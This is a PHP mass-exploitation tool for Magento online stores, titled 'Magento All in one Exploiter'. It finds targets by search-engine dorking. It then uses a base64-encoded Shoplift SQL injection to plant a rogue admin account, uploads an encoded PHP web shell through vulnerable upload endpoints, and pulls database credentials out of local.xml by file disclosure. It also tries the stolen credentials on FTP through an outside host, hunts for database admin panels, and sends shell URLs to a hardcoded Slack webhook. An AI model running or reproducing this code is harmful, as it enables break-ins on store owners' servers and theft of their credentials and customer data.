Untitled

<?php
function logo()
{
	$logo = "=======================================================\n";
	$logo .= "Magento All in one Exploiter\n";
	$logo .= "Created By Pak Haxor Special Thank To Papah Crew\n";
	$logo .= "Thank To Yogyakarta BlackHat & All Coder Indonesian\n";
	$logo .= "=======================================================\n";
	echo $logo;
}
function CurlPost($url, $post = false,$type=null){
		if($type == 1)
		{
			$ch = curl_init();
			curl_setopt ($ch, CURLOPT_URL, $url);
			curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
			curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
			curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
			curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
			curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
			curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
			curl_setopt ($ch, CURLOPT_POST, 1);
			$headers  = array();
			$headers[] = 'Accept-Encoding: gzip, deflate';
			$headers[] = 'Content-Type: application/x-www-form-urlencoded';
			curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
			curl_setopt ($ch, CURLOPT_HEADER, 1);
			$result = curl_exec ($ch);
			curl_close($ch);
			return $result;
		}
		if($type == 2)
		{
			$ch = curl_init();
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
		curl_setopt($ch, CURLOPT_URL, $url);
		curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
		curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
		curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
		if($post !== false){
			$isi = '';
			foreach($post as $key=>$value){
				$isi .= $key.'='.$value.'&';
			}
			rtrim($isi, '&');
			curl_setopt($ch, CURLOPT_URL, $url);
			curl_setopt($ch, CURLOPT_POST, count($isi));
			curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
			curl_setopt($ch, CURLOPT_POSTFIELDS, $isi);
		}
		$data = curl_exec($ch);
		curl_close($ch);
		return $data;
		}
	}

function Jswebforms($site,$file)
{
	$post = array('files[]'=>"@$file") ;
	$ch = curl_init();
	curl_setopt ($ch, CURLOPT_URL, "$site/js/webforms/upload/");
	curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
	curl_setopt($ch, CURLOPT_POST, true);
	curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
	curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
	curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
	$data = curl_exec($ch);
	curl_close($ch);
	$json = json_decode($data);
	if(isset($json[0]->url))
	{
		$shell = get_content($json[0]->url);
		return (preg_match("/Pak Haxor/",$shell)) ? $json[0]->url : false;
	}
}
function ROGMAGE($site,$file)
{
	$post = array('tuUploadFile'=>"@$file") ;
	$ch = curl_init();
	curl_setopt ($ch, CURLOPT_URL, "$site/js/rokmage_tinymce/tinyupload.php");
	curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
	curl_setopt($ch, CURLOPT_POST, true);
	curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
	curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
	curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
	$data = curl_exec($ch);
	$url = parse_url($site);
	$target = (!isset($url["scheme"]) ? "http://".$site : $url["scheme"]."://".$url["host"]);
	$checkshell = get_content($target."/media/rt-tinymce-uploads/sj.php");
	return $checkshell;


}
function webhooksending($text)
{
	$url = 'https://hooks.slack.com/services/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';
	$ch = curl_init($url);
	$jsonData = array(
	    'text' => $text
	);
	$jsonDataEncoded = json_encode($jsonData);
	curl_setopt($ch, CURLOPT_POST, 1);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	curl_setopt($ch, CURLOPT_POSTFIELDS, $jsonDataEncoded);
	curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/json'));
	$result = @curl_exec($ch);
	return ($result == "ok") ? true : false ;

}
function createshell()
{
	$ext = array("php","php5","php7","php.j","phtml","shtml","php.pjpeg");
	$shell = "PD9waHANCmVjaG8gYmFzZTY0X2RlY29kZSgiVUdGcklFaGhlRzl5Iik7DQplY2hvICI8YnI+Ii5waHBfdW5hbWUoKS4iPGJyPiI7DQplY2hvICI8Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPg0KPGlucHV0IHR5cGU9J2ZpbGUnIG5hbWU9J2lkeCc+PGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0ndXBsb2FkJyB2YWx1ZT0ndXBsb2FkJz4NCjwvZm9ybT4iOw0KaWYoJF9QT1NUWyd1cGxvYWQnXSkgew0KCWlmKEBjb3B5KCRfRklMRVNbJ2lkeCddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydpZHgnXVsnbmFtZSddKSkgew0KCWVjaG8gInN1a3NlcyI7DQoJfSBlbHNlIHsNCgllY2hvICJnYWdhbCI7DQoJfQ0KfQ0KPz4=";
	for($i=0;$i<count($ext);$i++)
	{
		$fp = fopen("sj.".$ext[$i], 'a+');
		fwrite($fp, base64_decode($shell));
		fclose($fp);
	}
	return $ext;
}
function get_content($url)
{
	return @file_get_contents($url);
}
function FinderPhpMyAdmin($site)
{
	$x = 1;
	$list = array(
	'/phpMyAdmin/',
	'/phpmyadmin/',
	'/PMA/',
	'/pma/',
	'/dbadmin/',
	'/mysql/',
	'/myadmin/',
	'/phpmyadmin2/',
	'/phpMyAdmin2/',
	'/phpMyAdmin-2/',
	'/php-my-admin/',
	'/phpMyAdmin-2.2.3/',
	'/phpMyAdmin-2.2.6/',
	'/phpMyAdmin-2.5.1/',
	'/phpMyAdmin-2.5.4/',
	'/phpMyAdmin-2.5.5-rc1/',
	'/phpMyAdmin-2.5.5-rc2/',
	'/phpMyAdmin-2.5.5/',
	'/phpMyAdmin-2.5.5-pl1/',
	'/phpMyAdmin-2.5.6-rc1/',
	'/phpMyAdmin-2.5.6-rc2/',
	'/phpMyAdmin-2.5.6/',
	'/phpMyAdmin-2.5.7/',
	'/phpMyAdmin-2.5.7-pl1/',
	'/phpMyAdmin-2.6.0-alpha/',
	'/phpMyAdmin-2.6.0-alpha2/',
	'/phpMyAdmin-2.6.0-beta1/',
	'/phpMyAdmin-2.6.0-beta2/',
	'/phpMyAdmin-2.6.0-rc1/',
	'/phpMyAdmin-2.6.0-rc2/',
	'/phpMyAdmin-2.6.0-rc3/',
	'/phpMyAdmin-2.6.0/',
	'/phpMyAdmin-2.6.0-pl1/',
	'/phpMyAdmin-2.6.0-pl2/',
	'/phpMyAdmin-2.6.0-pl3/',
	'/phpMyAdmin-2.6.1-rc1/',
	'/phpMyAdmin-2.6.1-rc2/',
	'/phpMyAdmin-2.6.1/',
	'/phpMyAdmin-2.6.1-pl1/',
	'/phpMyAdmin-2.6.1-pl2/',
	'/phpMyAdmin-2.6.1-pl3/',
	'/phpMyAdmin-2.6.2-rc1/',
	'/phpMyAdmin-2.6.2-beta1/',
	'/phpMyAdmin-2.6.2-rc1/',
	'/phpMyAdmin-2.6.2/',
	'/phpMyAdmin-2.6.2-pl1/',
	'/phpMyAdmin-2.6.3/',
	'/phpMyAdmin-2.6.3-rc1/',
	'/phpMyAdmin-2.6.3/',
	'/phpMyAdmin-2.6.3-pl1/',
	'/phpMyAdmin-2.6.4-rc1/',
	'/phpMyAdmin-2.6.4-pl1/',
	'/phpMyAdmin-2.6.4-pl2/',
	'/phpMyAdmin-2.6.4-pl3/',
	'/phpMyAdmin-2.6.4-pl4/',
	'/phpMyAdmin-2.6.4/',
	'/phpMyAdmin-2.7.0-beta1/',
	'/phpMyAdmin-2.7.0-rc1/',
	'/phpMyAdmin-2.7.0-pl1/',
	'/phpMyAdmin-2.7.0-pl2/',
	'/phpMyAdmin-2.7.0/',
	'/phpMyAdmin-2.8.0-beta1/',
	'/phpMyAdmin-2.8.0-rc1/',
	'/phpMyAdmin-2.8.0-rc2/',
	'/phpMyAdmin-2.8.0/',
	'/phpMyAdmin-2.8.0.1/',
	'/phpMyAdmin-2.8.0.2/',
	'/phpMyAdmin-2.8.0.3/',
	'/phpMyAdmin-2.8.0.4/',
	'/phpMyAdmin-2.8.1-rc1/',
	'/phpMyAdmin-2.8.1/',
	'/phpMyAdmin-2.8.2/',
	'/sqlmanager/',
	'/mysqlmanager/',
	'/p/m/a/',
	'/PMA2005/',
	'/pma2005/',
	'/phpmanager/',
	'/php-myadmin/',
	'/phpmy-admin/',
	'/webadmin/',
	'/sqlweb/',
	'/websql/',
	'/webdb/',
	'/mysqladmin/',
	'/mysql-admin/',
	'/mya/',
	);
	if(isset($site))
	{
	echo "\n[+] Searching Phpmyadmin Login : ";
		foreach($list as $path => $test)
		{
			$ch = curl_init();
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
			curl_setopt($ch, CURLOPT_HEADER, 1);
			curl_setopt($ch, CURLOPT_URL, $site.$test);
			$result = curl_exec($ch);
			curl_close($ch);
			if (preg_match("/200 OK/", $result))
			{
				return $site.$test;
				break;
			}
			else if (preg_match("/401 Unauthorized/", $result))
			{
				return $site.$test;
			}
			else
			{
				echo ".";
			}
		}
	}
}

function finderAdminer($site)
{
	$list = array(
	'/adminer.php',
'/adminer-4.2.6-dev.php',
'/adminer-4.2.5.php',
'/adminer-4.2.4.php',
'/adminer-4.2.3.php',
'/adminer-4.2.2.php',
'/adminer-4.2.1.php',
'/adminer-4.2.0.php',
'/adminer-4.1.0.php',
'/adminer-4.0.3.php',
'/adminer-4.0.2.php',
'/adminer-4.0.1.php',
'/adminer-4.0.0.php',
'/adminer-3.7.1.php',
'/adminer-3.7.0.php',
'/adminer-3.6.4.php',
'/adminer-3.6.3.php',
'/adminer-3.6.2.php',
'/adminer-3.6.1.php',
'/adminer-3.6.0.php',
'/adminer-3.5.1.php',
'/adminer-3.5.0.php',
'/adminer-3.4.0.php',
'/adminer-3.3.4.php',
'/adminer-3.3.3.php',
'/adminer-3.3.2.php',
'/adminer-3.3.1.php',
'/adminer-3.3.0.php',
'/adminer-3.2.2.php',
'/adminer-3.2.1.php',
'/adminer-3.2.0.php',
'/adminer-3.1.0.php',
'/adminer-3.0.1.php',
'/adminer-3.0.0.php',
'/adminer-2.3.2.php',
'/adminer-2.3.1.php',
'/adminer-2.3.0.php',
'/adminer-2.2.1.php',
'/adminer-2.2.0.php',
'/adminer-2.1.0.php',
'/adminer-2.0.0.php',
'/adminer-1.11.1.php',
'/adminer-1.11.0.php');
	if(isset($site))
	{
	echo "\n[+] Searching Adminer Login : ";
		foreach($list as $path => $test)
		{
			$ch = curl_init();
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
			curl_setopt($ch, CURLOPT_HEADER, 1);
			curl_setopt($ch, CURLOPT_URL, $site.$test);
			$result = curl_exec($ch);
			curl_close($ch);
			if (preg_match("/200 OK/", $result))
			{
				return $site.$test;
				break;
			}
			else if (preg_match("/401 Unauthorized/", $result))
			{
				return $site.$test;
			}
			else
			{
				echo ".";
			}
		}
	}
}

function ftplogin($host,$user,$pass)
{
	$con = ftp_connect($host) or die("Couldn't connect");
	ftp_login($con,  $user,  $pass);
	return is_array(ftp_nlist($con, ".")) ? true : false;
}
function GetStr($start,$end,$string){
		$a = explode($start,$string);
		$b = explode($end,$a[1]);
		return $b[0];
	}
function userFTP($username)
{
	$user = explode("_",$username);
	return (isset($user[1])) ? $user[1] : $user[0];
}

function ReadStdin($prompt, $valid_inputs=null, $default = '') {
    while(!isset($input) || (is_array($valid_inputs) && !in_array($input, $valid_inputs)) || ($valid_inputs == 'is_file' && !is_file($input))) {
        echo $prompt;
        $input = strtolower(trim(fgets(STDIN)));
        break;
        if(empty($input) && !empty($default)) {
            $input = $default;
        }
    }
    return $input;
}
function NameXFile($file)
{
	$validation = explode('.',$file);
	$ext = array("txt","log","lst");
	for($x=0;$x<count($ext);$x++)
	{
		if($validation[1] == $ext[$x++])
		{
			return true;
		}
	}
}
function LoginDownloader($url){
		$link = parse_url($url);
		if(isset($link["scheme"]))
		{
			$data = CurlPost(sprintf("%s://%s/downloader/",$link["scheme"],$link["host"]),
						array("username" => "erik",
							  "password" => "erik12345"),2
						);
		}
		else
		{
			$data = CurlPost("http://$url/downloader",
						array("username" => "erik",
							  "password" => "erik12345"),2
						);
		}
		if(preg_match("/Log Out/i",$data) || (preg_match("/Return to Admin/i",$data))){
			$permission = (!preg_match("/Warning: Your Magento folder does not have sufficient write permissions./i",$data) ? "Writeable" : "Denied");
			$smtp = (preg_match("/Smtp/",$data) ? "Yes" : "No");
			$filemanager = (preg_match("/File_System/",$data) ? "Yes":"No");
			return $permission.
			"\n 	==> Smtp : $smtp".
			"\n 	==> Filemanager : $filemanager";
		} else {
			return "Failed";
		}
	}
function getDomain($keyword)
{
	if($keyword == 1)
	{
		return array($argv[1]);
	}
}
function filterDomain($domains)
{
	$url = parse_url($domains);
	$target = (!isset($url["scheme"]) ? "http://".$domains : $url["scheme"]."://".$url["host"]);
	if(preg_match('/http/',$target))
	{
		$reparse = parse_url($target);
		$domain = (!isset($reparse["scheme"]) ? $target : $reparse["host"]);
		if (!filter_var("http://$domain", FILTER_VALIDATE_URL) === false)
		{
			if($domain !== "")
			{
				$checkdomain = explode('.',$domain);
				if(isset($checkdomain[1]))
				{
					return $domain;
				}
			}
		}
	}
}

/*DEMO function checkstatusMysqlLogin($host,$user,$pass,$domain = null,$stop = true)
{

	$mysql = @mysqli_connect($host,$user,$pass);
	$sql = array($host,$user,$pass);
	if(!$mysql)
	{
		if($stop == true)
		{
			return false;
		}
		$recheck = checkstatusMysqlLogin($domain,$user,$pass);
		if(!$recheck)
		{
			$domain = str_replace("www.", "", $domain);
			checkstatusMysqlLogin("mysql.".$domain,$user,$pass,null,true);
		}
		else
		{
			return $sql;
		}
	}
	return $sql;
}*/
function wrongpress($read,$angka)
{
	if(!isset($read) or $read > $angka or !(int)($read) or $read = "")
	{
		echo "Wrong Press !!!";
		die();
	}
}

function SearchEngine($dork,$angka)
{
		$list = array();
		if($angka == 1)
		{
			for($i=0;$i<=1000;$i+=10){
						$search = CurlPost("http://www.bing.com/search?q=".urlencode($dork)."&first=".$i,false,2);
						preg_match_all('/<a href=\"?http:\/\/([^\"]*)\"/m', $search, $m);
						foreach($m[1] as $link){
							if(!preg_match("/live|msn|bing|microsoft/",$link)){
								if(!in_array($link,$list)){
									$domain = filterDomain($link);
									$list[] = $domain;
								}
							}
						}
						echo ".";
					}
					echo "\nDitemukan : ".count(array_unique($list))."\n";
					return array_unique($list);
		}
		if($angka == 2)
		{
			$ccbing = array("ca","br","be","nl","uk","it","es","de","no","dk","se","ch","ru","jp","cn","kr","mx","ar","cl","au");
			for($x=0;$x<=count($ccbing)-1;$x++){
					for($i=0;$i<=1000;$i+=10){
						$search = CurlPost("http://www.bing.com/search?q=".urlencode($dork)."&cc=".$ccbing[$x]."&rf=1&first=".$i."&FORM=PORE",false,2);
						preg_match_all('/<a href=\"?http:\/\/([^\"]*)\"/m', $search, $m);
						foreach($m[1] as $link){
							if(!preg_match("/live|msn|bing|microsoft/",$link)){
								if(!in_array($link,$list)){
									$domain = filterDomain($link);
									$fp = fopen("domain.txt", 'a+');
									fwrite($fp, $domain."\n");
									fclose($fp);
									$list[] = $domain;
								}
							}
						}
						echo ".";
					}
				}
				echo "\nDitemukan : ".count(array_unique($list))."\n";
				return array_unique($list);
		}
		if($angka == 3)
		{
			for($x=1;$x<=1000;$x+=10){
				$check = CurlPost('http://www.dogpile.com/dogpilecontrol/search/web?qsi='.$x.'&q='.$dork.'&fcoid=4&fcop=results-bottom&fpid=2',false,2);
				preg_match_all('# target="_blank">(.*?)</a>#',$check,$matches);
				foreach($matches[1] as $domain)
				{
					$domain = str_replace("<strong>", "", $domain);
					$domain = str_replace("</strong>", "", $domain);
					$list[] = filterDomain($domain);
				}
				echo ".";
			}
			echo "\nDitemukan : ".count(array_unique($list))."\n";
			return array_unique($list);
		}
}
logo();
$getdomains = ReadStdin("[1] Making Dork\n[2] Making List\n[3] Making Url\nSelected : ", array('1','2','3'));
	wrongpress($getdomains,3);
	if($getdomains == 1)
	{
		$dorker = ReadStdin("[1] Bing\n[2] Bing By Country\n[3] Dogpile\nSelected : ",array("keyword"));
		if(isset($dorker))
		{
			wrongpress($dorker,3);
			$url1 = ReadStdin("Masukkan Dork : ",array("keyword"));
			echo "Grabbing : ";
			$get = SearchEngine($url1,$dorker);
		}
	}
	if($getdomains == 2)
	{
		$url2 = ReadStdin("Masukkan Namafile TXT : ",array("keyword"));
		$get =(NameXFile($url2) == true) ? file($url2) : die("Masukkan Nama File Dengan Benar !!!");
	}
	if($getdomains == 3)
	{
		$url3 = ReadStdin("Masukkan url : ",array("keyword"));
		$get = array($url3);
	}

$addadmin = ReadStdin('Apakah Anda Ingin Menggunakan Shoplift(Magento Add Admin) ? (Y/N): ', array('Y', 'N'));
$jswebforms = ReadStdin('Apakah Anda Ingin Menggunakan Magento Js Webforms ? (Y/N): ', array('Y', 'N'));
$lfdScanning = ReadStdin('Apakah Anda Ingin Menggunakan LFD Scanning + magmi + amasty ? (Y/N): ', array('Y', 'N'));
$rogmage_tinymce = ReadStdin('Apakah Anda Ingin Menggunakan TinyMCE ROGMAGE ? (Y/N): ', array('Y', 'N'));
$ftpScanning = ReadStdin('Apakah Anda Ingin Menggunakan FTP Scanning(BETA) ? (Y/N): ', array('Y', 'N'));
$scanningMysqlLogin = ReadStdin('Apakah Anda Ingin Menggunakan mysql finder ? (Y/N): ', array('Y', 'N'));
//==================GET FROM FILEDATA====================//
$x=1;
foreach($get as $domain)
{
	if($getdomains == 2)
	{
		$domain = str_replace("\r", "", $domain);
		$domain = str_replace("\n", "", $domain);
	}
	echo "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
	echo "Scanning Url : $domain\n";
	if($addadmin == "y")
	{
		echo "[+] Add Admin Status : ";
		$path = "/admin/Cms_Wysiwyg/directive/index/";
		$post = 'filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdlcmlrMTIzNDUnKSApLCBDT05DQVQoJzonLCBAU0FMVCApKTtTRUxFQ1QgQEVYVFJBIDo9IE1BWChleHRyYSkgRlJPTSBhZG1pbl91c2VyIFdIRVJFIGV4dHJhIElTIE5PVCBOVUxMO0lOU0VSVCBJTlRPIGBhZG1pbl91c2VyYCAoYGZpcnN0bmFtZWAsIGBsYXN0bmFtZWAsYGVtYWlsYCxgdXNlcm5hbWVgLGBwYXNzd29yZGAsYGNyZWF0ZWRgLGBsb2dudW1gLGByZWxvYWRfYWNsX2ZsYWdgLGBpc19hY3RpdmVgLGBleHRyYWAsYHJwX3Rva2VuYCxgcnBfdG9rZW5fY3JlYXRlZF9hdGApIFZBTFVFUyAoJ0ZpcnN0bmFtZScsJ0xhc3RuYW1lJywnZW1haWxAZXhhbXBsZS5jb20nLCdlcmlrJyxAUEFTUyxOT1coKSwwLDAsMSxARVhUUkEsTlVMTCwgTk9XKCkpO0lOU0VSVCBJTlRPIGBhZG1pbl9yb2xlYCAocGFyZW50X2lkLHRyZWVfbGV2ZWwsc29ydF9vcmRlcixyb2xlX3R5cGUsdXNlcl9pZCxyb2xlX25hbWUpIFZBTFVFUyAoMSwyLDAsJ1UnLChTRUxFQ1QgdXNlcl9pZCBGUk9NIGFkbWluX3VzZXIgV0hFUkUgdXNlcm5hbWUgPSAnZXJpaycpLCdGaXJzdG5hbWUnKTs=%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1';
		$exploit = CurlPost($domain.$path,$post,1);
		if(preg_match('#200 OK#', $exploit))
		{
			echo "SUCCESS";
			echo "\n[+] Check Status Login :";
			$postlogin = array("login[username]" => "erik",
							  "login[password]" => "erik12345");
			$postlogindownloader = array("username" => "erik",
										  "password" => "erik12345");
			$checklogin = CurlPost($domain."/admin",$postlogin,2);
			$downloader = LoginDownloader($domain);
			if(preg_match('/<body id="html-body" class=" adminhtml-dashboard-index">/', $checklogin))
			{
				$total = GetStr("<span class=\"price\">","</span>",$checklogin);
				$average = GetStr('<span class="nowrap" style="font-size:18px;"><span class="price">',"</span>",$checklogin);
				echo "TRUE\n";
				$message  =	"====================================\n";
				$message .= "	==> Url Login : $domain/admin\n";
				$message .= "	==> Username : erik\n";
				$message .= "	==> Password : erik12345\n";
				$message .= "	==> Lifetime Sales : $total \n";
				$message .= "	==> Average Orders : $average \n";
				$message .= "	==> Downloader : $downloader \n";
				echo $message;

				$fp = fopen("shoplift.txt", 'a+');
				fwrite($fp, $message);
				fclose($fp);
			}
			else
			{
				echo "FALSE\n";
			}
			echo "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++";
		}
		else
		{
			echo "FAILURE\n";
		}
	}

	if($jswebforms == "y")
	{
		if(CurlPost($domain."/js/webforms/upload",false,2) == "[]" or CurlPost($domain."/js/webforms/upload",false,2) == "null")
		{
			echo "[+] Uploaded Shell : ";
			if(!file_exists("sj.php"))
			{
					$ext = createshell();
			}
			else
			{
					$ext = array("php","php5","php7","php.j","phtml","shtml","php.pjpeg");
			}
			for($i=0;$i<count($ext);$i++)
			{
				echo ".";
				$exploit = Jswebforms($domain,"sj.".$ext[$i]);
				if(isset($exploit))
				{
						echo "\n".$exploit." Success \n";
						$fp = fopen("jswebforms.txt", 'a+');
						webhooksending($exploit."\n");
						fwrite($fp, $exploit."\n");
						fclose($fp);
						break;
				}
			}
		}
		else
		{
			echo "[-] Webforms Not vuln\n";
		}
	}
	if($rogmage_tinymce == "y")
	{
		$checkVuln = CurlPost($domain."/js/rokmage_tinymce/tinyupload.php",false,2);
		echo "[+] Tiny MCE Scanning :";
		if(preg_match('/rt-tinymce-uploads/',$checkVuln))
		{
			echo "VULN\n";
			echo "Uploading Shell :";
			$rogmage = ROGMAGE($domain,"sj.php");
			if(preg_match('/Pak Haxor/',$rogmage))
			{
				echo " $domain/media/rt-tinymce-uploads/sj.php\n";
				$fp = fopen("rogmage.txt", 'a+');
						fwrite($fp, "$domain/media/rt-tinymce-uploads/sj.php\n");
						fclose($fp);
			}
			else
			{
				echo " Shell Not FOUND\n";
			}
		}
		else
		{
			echo "FAILED\n";
		}
	}
	if($lfdScanning == "y")
	{
		$path = array("Amasty" => "/app/etc/local.xml",
							"Magmi" => "/magmi/web/download_file.php?file=../../app/etc/local.xml"
						);
		echo " [+] LFD Scanning :";
		foreach($path as $key => $value)
		{
			$url = parse_url($domain);
			$target = (!isset($url["scheme"]) ? "http://".$domain : $url["scheme"]."://".$url["host"]);
			$lfd = get_content($target.$value);
			if(preg_match("/<host><!/",$lfd))
			{
				echo "Found\n";
				$date = GetStr("<date><![CDATA[","]]></date>",$lfd);
				$host = GetStr("<host><![CDATA[","]]></host>",$lfd);
				$username = GetStr("<username><![CDATA[","]]></username>",$lfd);
				$password = GetStr("<password><![CDATA[","]]></password>",$lfd);
				$dbname = GetStr("<dbname><![CDATA[","]]></dbname>",$lfd);
				$lfdconfig = "\n==============[Mysql Login]===============";
				$lfdconfig .= "\nDomain : $domain";
				$lfdconfig .= "\nDate : $date";
				$lfdconfig .= "\nHost : $host";
				$lfdconfig .= "\nUsername : $username";
				$lfdconfig .= "\nPassword : $password";
				$lfdconfig .= "\nDatabaseName : $dbname";
				$lfdconfig .= "\n=========================================";
				echo $lfdconfig;

				$fp = fopen("lfdconfig.txt", 'a+');
						fwrite($fp, $lfdconfig);
						fclose($fp);
				if($ftpScanning == "y")
			{
					echo "\n[+] Scanning FTP LOGIN : ";
					$url = parse_url($domain);
					$ftp = get_content("http://www.fccarolinasoccer.com/ftp.php?domain=$domain&username=".userFTP($username)."&password=$password");
				if(preg_match("/SUCCESS/",$ftp))
				{
					echo "SUCCESS\n";
					$ftpinfo = "================================\n";
					$ftpinfo .= "Host : ftp.".$url["host"]."\n";
					$ftpinfo .= "Username : ".userFTP($username)."\n";
					$ftpinfo .= "Password : ".$password."\n";
					$ftpinfo .= "================================\n";
					echo $ftpinfo;
					$fp = fopen("ftpmagento.txt", 'a+');
						fwrite($fp, $ftpinfo);
						fclose($fp);
				}
				else
				{
					echo "Failure\n";
				}
		    }
		    	if($scanningMysqlLogin == "y")
		    	{
					$finderPhpmyadmin = FinderPhpMyAdmin("$domain");
					if(isset($finderPhpmyadmin))
					{
						$fp = fopen("lfdconfig.txt", 'a+');
							fwrite($fp, "\nPath Mysql login : $finderPhpmyadmin");
							fclose($fp);
					echo "\n Path Mysql login : $finderPhpmyadmin";

					}
					elseif(!$finderPhpmyadmin)
					{
						$adminer = finderAdminer("$domain");
							if(isset($adminer))
							{
							$fp = fopen("lfdconfig.txt", 'a+');

								fwrite($fp, "\nPath Mysql login : $adminer ");
								fclose($fp);
								echo "\n Path Mysql login : $adminer ";
							}
							 else
							 {
							/*DEMO{
								echo "\n[+] Manual MYSQL CHECKED :";
							    $manualMYSQL = checkstatusMysqlLogin($host,$username,$password,"$domain");
							   	if($manualMYSQL !== false)
							   	{
							   		echo "SUCCESS\n";
							   		webhooksending("CAN LOGIN MANUAL == >
							   			HOST :".$manualMYSQL[0]
							   			."USER :".$manualMYSQL[1]
							   			."Passowrd :".$manualMYSQL[2]."\n");
							   	}
							   	else
							   	{*/
							   		echo "\nFAILED";
							   /*DEMO	}*/
							}
					}
				}
			break;
			}
			else
			{
				echo " \n==>[$key] Not Found";
			}
		}
	}

}
?>